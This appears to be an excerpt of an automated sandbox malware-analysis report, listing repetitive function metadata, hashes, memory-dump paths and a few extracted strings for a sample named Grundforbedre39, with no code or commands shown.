                                                                                      • Opcode ID: cc814594c8e8e743af58873d0a14eb44dc217281979eb553c8ac2fcba90ae77b
                                                                                      • Instruction ID: b5be2f5d75cf3baf455447a37c36decf5195ddf8e30a17bfb9592bc1ba9981e5
                                                                                      • Opcode Fuzzy Hash: cc814594c8e8e743af58873d0a14eb44dc217281979eb553c8ac2fcba90ae77b
                                                                                      • Instruction Fuzzy Hash: 2141C275A05704CFEB14CF25D990A49BBF2FF84354F91869AC8069B6A0DF30BA81CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalTags
                                                                                      • API String ID: 0-1106856819
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #%u
                                                                                      • API String ID: 0-232158463
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0h`5
                                                                                      • API String ID: 0-2766475937
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EXT-
                                                                                      • API String ID: 0-1948896318
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryHash
                                                                                      • API String ID: 0-2202222882
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P5
                                                                                      • API String ID: 0-2020957795
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: verifier.dll
                                                                                      • API String ID: 0-3265496382
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Flst
                                                                                      • API String ID: 0-2374792617
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: BinaryName
                                                                                      • API String ID: 0-215506332
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: S5
                                                                                      • API String ID: 0-2861399667
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6baafd8d3242770bc57c4abb1cb6c9a0b7243c22d76638935783f4538bb4ac78
                                                                                      • Instruction ID: f560310dbf288488c4b077c514067612bca3565e965ec86d27d38bdec48cc5d4
                                                                                      • Opcode Fuzzy Hash: 6baafd8d3242770bc57c4abb1cb6c9a0b7243c22d76638935783f4538bb4ac78
                                                                                      • Instruction Fuzzy Hash: 55A1BAB2A18601EFD711CF24C980B9AB7E9FF88705F810929E5869B690D774FC41CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4cc435f12124bfba8ff13bf823cbdc3238e02e9963cd824dd56749cd13f62a2
                                                                                      • Instruction ID: 97d9091d821ebdb719c27a7ae0663e147e6d19ca54647f55d11619e775a982cf
                                                                                      • Opcode Fuzzy Hash: e4cc435f12124bfba8ff13bf823cbdc3238e02e9963cd824dd56749cd13f62a2
                                                                                      • Instruction Fuzzy Hash: 5991217AA046158FE700CB68C480BBE77B2FF98750F5541A9E8059B2C0EB34B942CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 006ffc1cb6decd9f456ac37fdd0e27abf31f97dfcfcc4545450a6b7f83ce0178
                                                                                      • Instruction ID: de51909a98f067dee4caf0140c8f1f25aeafef896889d4c584ae43da718c7ac6
                                                                                      • Opcode Fuzzy Hash: 006ffc1cb6decd9f456ac37fdd0e27abf31f97dfcfcc4545450a6b7f83ce0178
                                                                                      • Instruction Fuzzy Hash: 77B15078A043059FEF24CF18D540B99BBB1BF88394F50455DDC22AB391DBB4EA82CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                      • Instruction ID: 92334dac6ff074bb14b25223de7058dc0c97a01982cb95a4a15eed8f0ce620a1
                                                                                      • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                      • Instruction Fuzzy Hash: EF71A475A8021A9BDF00CFD5D490AAFB7B6FF44BA0FD5459AD801AB240EB34F945CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dd7ef7fdab190c18e6a8c1a213c233be98e7dbb706321db6f2ca2ebde0f8db40
                                                                                      • Instruction ID: ad513f1a77ee6d693fa6ae05230152f313bee70773f0b99bf71e3195877523cf
                                                                                      • Opcode Fuzzy Hash: dd7ef7fdab190c18e6a8c1a213c233be98e7dbb706321db6f2ca2ebde0f8db40
                                                                                      • Instruction Fuzzy Hash: E4815EB1A44609AFEB15CFA4C880BDEB7FAFF88354F504829E556A7210DB30BD45DB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1afd3bc31c6f513f5e82dd7ca230479412ec109f82a29e54c5f6b2df04e90a7
                                                                                      • Instruction ID: be0a83af4a95407c63895e3dcfc9d1bc088ad883cefff6e0f5c5a0fcc9a8a499
                                                                                      • Opcode Fuzzy Hash: f1afd3bc31c6f513f5e82dd7ca230479412ec109f82a29e54c5f6b2df04e90a7
                                                                                      • Instruction Fuzzy Hash: C571DFB4909629EFDB21CF58C990BADBBB5FF49710F14455AE845AB380DB71B801CBE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a459ff464054acce5f74a4f3f7f98d1eaaf320716e9f4b3e2f413cc27f7de3e0
                                                                                      • Instruction ID: 5714d377c4f39e6e17c1ba0f01b44d50112d19f5062db150a4d65d57bb4341a1
                                                                                      • Opcode Fuzzy Hash: a459ff464054acce5f74a4f3f7f98d1eaaf320716e9f4b3e2f413cc27f7de3e0
                                                                                      • Instruction Fuzzy Hash: F1719A7A7046458FD301CF28C890B26B7E6FF88710F0585A9E859CB392DB74E945CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c5302a299a8339b9a1bb6ec15382f6ce3e254b4fd55b2b4cd51d42766482cb0
                                                                                      • Instruction ID: a413d19046816c544e1fc781faaba165328795ad26027919d0703d3aef67fd9a
                                                                                      • Opcode Fuzzy Hash: 0c5302a299a8339b9a1bb6ec15382f6ce3e254b4fd55b2b4cd51d42766482cb0
                                                                                      • Instruction Fuzzy Hash: C0514774A18341DFEB14CF2DC08091ABBE5FB88750F50496EE99A97354DB70FA48CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
